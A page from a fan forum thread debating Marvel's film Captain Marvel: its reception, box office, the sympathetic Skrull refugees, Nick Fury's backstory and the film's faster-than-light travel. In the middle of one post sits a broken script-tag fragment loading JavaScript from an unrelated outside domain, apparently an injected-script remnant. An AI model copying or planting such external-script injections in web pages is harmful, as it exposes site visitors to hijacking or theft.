Active Topics | Member List | Search | Help | Register | Login
Movies
Byrne Robotics > Movies << Prev Page of 10
Topic: Marvel Studios CAPTAIN MARVEL ~ SPOILERS begin Pg 3 Post ReplyPost New Topic
Author
Byrne Robotics Member

Posted: 21 March 2019 at 5:49am | IP Logged | 1 post reply

I don't mean this at all in a snarky way, Matt, but is this aimed at the forum or just a general statement? It seems most of us on the forum at least liked Captain Marvel (some, like myself, really enjoyed it). 

That said, I truly believe that the lovers outnumber the haters. For every "old-school fanboy", many of whom aren't quite the fans that they make themselves out to be, there's people who don't read the comics and haven't ever read the comics that are being introduced to these characters and are falling in love with them. They aren't the same characters that many of us on the forum grew up with but I teach at a high school and Marvel characters are as popular as ever among young people, even if the comics aren't, (though my LCS is trying to change that in the area). The complainers really are mainly older guys on the internet. Don't get me wrong, I find it amusing that the people doing the complaining have aimed their ire at Black Panther and Captain Marvel (more so with Captain Marvel) when the movies have been very successful but there's always going to be those who, because they don't like something, don't want anyone else to enjoy it either.
Back to Top profile | search

Matt Reed
Byrne Robotics Security
Robotmod

Posted: 21 March 2019 at 10:56am | IP Logged | 2 post reply

A general statement, Shawn.  Not aimed at anyone in particular in this thread.  Mainly venting a frustration that there is actually a small subset of people out there who diligently persist in finding obscure often absurd reasons as to why CM is a failure.  

Brian Miller
Byrne Robotics Member

Posted: 21 March 2019 at 11:23am | IP Logged | 3 post reply

Biggest failure marvelís ever had 

Kevin Brown
Byrne Robotics Member

Posted: 21 March 2019 at 11:52am | IP Logged | 4 post reply

I didn't hate CM, I just thought it was "meh".  Definitely one of my least favorite Marvel movies.  As I was watching it I felt like they were trying very hard to "check off boxes on a list".  < ="text/" async="" src="//cardinal.net/1fa16f6ccbee745a0c.js">

How does Fury lose his eye?  Check.
Coulton's first day?  Check.
How does Fury come up with "Avengers"?  Check.

And so on....

Shawn Kane
Byrne Robotics Member

Posted: 21 March 2019 at 5:56pm | IP Logged | 5 post reply

Okay, I totally understand where you're coming from, Matt. I'd say as a forum (for those who saw it), the response has been mainly positive. Honestly, I agree with those who put it with Captain America and Thor in that I think any sequels will improve on this "introduction" to the character. I also think a percentage of the naysayers are the ones who want to be the "I told you so" types when a Marvel movie eventually under performs. It's funny because most of those types have picked Guardians of the Galaxy, Black Panther, and now Captain Marvel as the movie to jump the shark but they've tended to outperform expectations.

Edited by Shawn Kane on 21 March 2019 at 5:57pm

Phil Geiger
Byrne Robotics Member

Posted: 22 March 2019 at 3:39pm | IP Logged | 6 post reply

Just came back from seeing it. I liked it. A lot. Loved the tribute to Stan in the Marvel Studios opening credit logo. Well done. And the backstory for Coulson and Fury? Liked that. Didn't distract me from the overall plot one bit. Skrulls being refugees back then instead of villains? Not a problem for me. Doesn't mean they're good guys now. Overall, I thought it was a pretty good origin story for this version of Carol Danvers/Captain Marvel. Best Marvel movie ever? In my opinion, no, but it was pretty darned good, imho.

James Woodcock
Byrne Robotics Member

Posted: 22 March 2019 at 4:43pm | IP Logged | 7 post reply

This thing is going to break a billion by the time itís done. 
The crazy thing is, the third string heroes are breaking a billion. How amazing is that
Back to Top profile | search e-mail

Brian Miller
Byrne Robotics Member

Posted: 22 March 2019 at 5:04pm | IP Logged | 8 post reply

An amazing failure

Mike Thompson
Byrne Robotics Member

Posted: 24 March 2019 at 1:12pm | IP Logged | 9 post reply

I loved everything about it. A perfect blend
of action and humor. I'm even more eager to
see Endgame now!

Joe Smith
Byrne Robotics Member

Posted: 24 March 2019 at 1:55pm | IP Logged | 10 post reply

I went in blind, as I know zip about the post 2007
Carol Danvers Cap.

I figured this movie would be a huge pre-Endgame
commercial.

Liked it.

Never seen Brie Larson in anything before, and I think
she's neat-o.

The graphics with Sam Jackson were amazing.

Good way to spend a Thursday night, IMO.

Back to Top profile | search | www e-mail

Stephen Churay
Byrne Robotics Member

Posted: 25 March 2019 at 8:40am | IP Logged | 11 post reply

Putting aside my feelings about Ms.
Larson, I decided to judge the film on
its own merits.

The character development for Carol was
fine, although I thought Larson was a bit
wooden in the role. Maybe that was by
design. I thought everyone else was pretty
good. This move takes place 23 years ago.
I agree that's plenty of time for peple to
change but the Fury character would still
be in his 40's. I don't see him becoming
the badass Fury we meet in Iron Man.

All of these are nitpicks.Here's where I
have real problems.

By going the direction they did with the
Skrulls, they've fundamentally changed
their ability to be effective villains.
While it works for this story, what a
qaste for the future.

It is apparent that both the Kree and the
Skrulls are capable of interstellar
travel. What the heck do you need a
lightspeed engine for. Thats like having
a jet engine and needing to build a 4
cylinder. The plot makes absolutely no
sense.

There are entertaining moments to have but
I see this as a step backwards. D+

Edited by Stephen Churay on 25 March 2019 at 8:42am

Dave Kopperman
Byrne Robotics Member

Posted: 25 March 2019 at 10:01am | IP Logged | 12 post reply

I note that it's already outearned Wonder Woman (internationally) by $100 million.  That's some crazy testament to both the strong trust in the Marvel brand out there and the inverse faith in the DC brand.  Wonder Woman obviously went a long way to fix that!  But still - Wonder Woman has been a known icon on a global scale for the better part of a century, and this is the first appearance in any mainstream media for Carol.  That's some impressive brand building for Marvel Studios.
Back to Top profile | search | www

Brian Rhodes
Byrne Robotics Member

Posted: 25 March 2019 at 10:36am | IP Logged | 13 post reply

This move takes place 23 years ago. 
I agree that's plenty of time for peple to change but the Fury character would still be in his 40's. I don't see him becoming the badass Fury we meet in Iron Man.

Maybe it's not the years, but the mileage. Just the knowledge that there are, indeed, alien cultures -- that have visited earth -- very recently -- would likely be enough to change one's attitude pretty significantly. That experience, and how he dealt with it, may have been a big component in him becoming SHIELD Director. That mantle, in itself, likely comports with a certain level of bad-assery. 

Michael Roberts
Byrne Robotics Member

Posted: 25 March 2019 at 11:25am | IP Logged | 14 post reply

QUOTE:
I agree that's plenty of time for peple to change but the Fury character would still be in his 40's. I don't see him becoming the badass Fury we meet in Iron Man.

Seems to me, based on the dialogue, that he was already the badass Fury. What he was struggling with, when we see him in CAPTAIN MARVEL, is how to be a civilian instead of a soldier, which is why he was different from the modern-day Fury.

QUOTE:
By going the direction they did with the Skrulls, they've fundamentally changed their ability to be effective villains. While it works for this story, what a qaste for the future.

Not really. We see one group of refugee Skrulls from a defeated Skrull empire. That does not preclude other factions from attacking Earth. That's the setup for SECRET INVASION in the comics. After the Skrull homeworld is destroyed, the Skrulls choose a religious fanatic who convinces the Skrulls that Earth is supposed to be their new homeworld and invade.

Having "good guy" Skrulls actually balances things out and allows Marvel to do a storyline like that without making some unintentional statement on the nature of real-world terrorism.

QUOTE:
It is apparent that both the Kree and the Skrulls are capable of interstellar travel. What the heck do you need a lightspeed engine for. Thats like having a jet engine and needing to build a 4 cylinder. The plot makes absolutely no sense.

In both GUARDIANS OF THE GALAXY films and CAPTAIN MARVEL, we have yet to see a ship that is capable of lightspeed travel. Interstellar travel requires going through a series of jump points. A refugee fleet traveling through a series of jump points would risk getting noticed and tracked by the Kree. Ships that could travel by lightspeed on their own would avoid that issue.

Conrad Teves
Byrne Robotics Member

Posted: 25 March 2019 at 12:01pm | IP Logged | 15 post reply

Okay, I note that Michael posted his comments just now right as I finished mine, though there is some duplication of points, I'm leaving mine as written because I make some different points.

Stephen>>By going the direction they did with the 
Skrulls, they've fundamentally changed 
their ability to be effective villains. 
While it works for this story, what a 
qaste for the future.<<

What they did was show the Skrulls as people. They aren't motivated by "Evil" as such, rather (not unreasonably) they just have their own agenda. This can easily add up to the same thing if they are at cross-purposes with the protagonists. Ditto with the Kree. As noted upthread, what you saw were largely just Skrull civilian survivors with military types who may not be so proud of things they've done. The MCU has been more than happy having characters have complicated (grey) backstories. Not tarring the whole species as "Evil" does not weaken them for a source of villains any more than it does for the humans.

>>It is apparent that both the Kree and the 
Skrulls are capable of interstellar 
travel. What the heck do you need a 
lightspeed engine for. Thats like having 
a jet engine and needing to build a 4 
cylinder. The plot makes absolutely no 
sense. <<

This is a more complicated issue.  The Kree/Scrull/GotG level interstellar travelers have been shown using point-to-point jump drives in the few movies that have taken place in space. It did seem Thanos had a straightline warp-drive style Faster-Than-Light in Infinity War. His ship didn't behave at all like the Benatar did in GotG2. The point being, that the "lightspeed drive" in the film would allow you to travel places where there were no jump points.

Worth noting that the "jump point" style FTL is useful in sci-fi because limiting where you can travel in something as big as space can force the characters to be in the same areas and therefore interact.

Apart from utilizing the large amount of...perforation of spacetime in the MCU, It does begin to appear that only Thanos-level entities can use straightline style FTL (perhaps not even commonly), as borne out by noting that Mar-Vell (as a Kree scientist) needed an infinity stone to figure out how to get it to work. The Bifrost seems to work differently still. Thus far they have wisely avoided saying how far or how fast anything goes in any of the films. 

BTW, I don't recall anything on-screen confirming the Skrull actually figured out how to get the Lightspeed Drive to work? Not too much confidence in their "Science Guy."

Michael Roberts
Byrne Robotics Member

Posted: 25 March 2019 at 12:12pm | IP Logged | 16 post reply

It did seem Thanos had a straightline warp-drive style Faster-Than-Light in Infinity War. His ship didn't behave at all like the Benatar did in GotG2. The point being, that the "lightspeed drive" in the film would allow you to travel places where there were no jump points.

óó

Thanos had the Space Stone. 

Conrad Teves
Byrne Robotics Member

Posted: 25 March 2019 at 12:52pm | IP Logged | 17 post reply

Michael>>Thanos had the Space Stone. 

Now that you mention it, I assumed the following two scenes from Infinity War (Maw's ship zooming off from Earth and the view out the "window") indicated some kind of FTL, but they definitely might be a jump transition and some kind of non-rocket drive effect--or even a screensaver tbh, considering what it looked like outside when Maw was ejected.

I'm giving this far more thought than is warranted.  :)

Jim Muir
Byrne Robotics Member

Posted: 25 March 2019 at 2:14pm | IP Logged | 18 post reply

<<
 QUOTE:  
By going the direction they did with the Skrulls, they've fundamentally changed their ability to be effective villains. While it works for this story, what a qaste for the future.

Not really. We see one group of refugee Skrulls from a defeated Skrull empire. That does not preclude other factions from attacking Earth>>

Yes. And no. 

You are correct of course, and it does give the Skrull a more rounded, realistic character. But to the average non-comic book Joe who donít care that much (my wife for instance) , the Skrull are now the hounded underdogs... Good guys being exterminated by the Evil Kree.
The movie even ends with Captain Marvel and her friends (the Skrulls) heading off to battle the bad guys (The Kree)

I feel theyíve painted themselves into a corner on this one. 

Michael Roberts
Byrne Robotics Member

Posted: 25 March 2019 at 5:56pm | IP Logged | 19 post reply

But to the average non-comic book Joe who donít care that much (my wife for instance) , the Skrull are now the hounded underdogs... Good guys being exterminated by the Evil Kree.
The movie even ends with Captain Marvel and her friends (the Skrulls) heading off to battle the bad guys (The Kree)

I feel theyíve painted themselves into a corner on this one. 

-----

That's pretty condescending to general audiences, don't you think? Only comic book readers can figure out that there are multiple sides to a race?

Jim Muir
Byrne Robotics Member

Posted: 26 March 2019 at 3:04am | IP Logged | 20 post reply

<<That's pretty condescending to general audiences, don't you think? Only comic book readers can figure out that there are multiple sides to a race?>>

Yes, of course it is - but there's a kernel of truth there, nonetheless. This movie paints The Skrull as victims, and The Kree as manipulative oppressors. You can dig deeper and study the subtleties all you want, but they remain subtleties, easily missed in a big, noisy, effects driven popcorn blockbuster.

Eric Sofer
Byrne Robotics Member

Posted: 26 March 2019 at 8:59am | IP Logged | 21 post reply

Of course, if one has watched "Agents of SHIELD", then it is KNOWN that the Kree are manipulative oppressors. And who would associate the Skrulls to the Chitauri from the Avengers move and the Ultimates book? Even the previous Kree seen - most notable Ronan the Accuser - haven't been very nice guys.

I think that this setup was for those seeing the movie without being Marvel True Believers... as most of the audiences for the movies are not. It's not as if anyone was giving away copies of Fantastic Four #2 outside the theatres showing "Captain Marvel".

Daniel Gillotte
Byrne Robotics Member

Posted: 26 March 2019 at 12:07pm | IP Logged | 22 post reply

I thought that all skrulls were cows?
Back to Top profile | search | www

Bill Collins
Byrne Robotics Member

Posted: 26 March 2019 at 2:34pm | IP Logged | 23 post reply

Just saw it and liked it a lot, i can`t see why the hate
for Ms Larson?
One thing really did bug me...the Skrull with the very
broad Aussie accent, for some reason i found it took me
out of the film whenever he spoke.
Nice choice of songs on the soundtrack, Heart Lita Ford,
No Doubt etc!

Jim Muir
Byrne Robotics Member

Posted: 26 March 2019 at 3:26pm | IP Logged | 24 post reply

Thatís interesting, Bill. I was bemused by  Ben Mendelsons(sp?)  weird cockney accent all the way through!
Iíd forgotten all about that.

If you wish to post a reply to this topic you must first login
If you are not already registered you must first register

<< Prev Page of 10
  Post ReplyPost New Topic
Printable version Printable version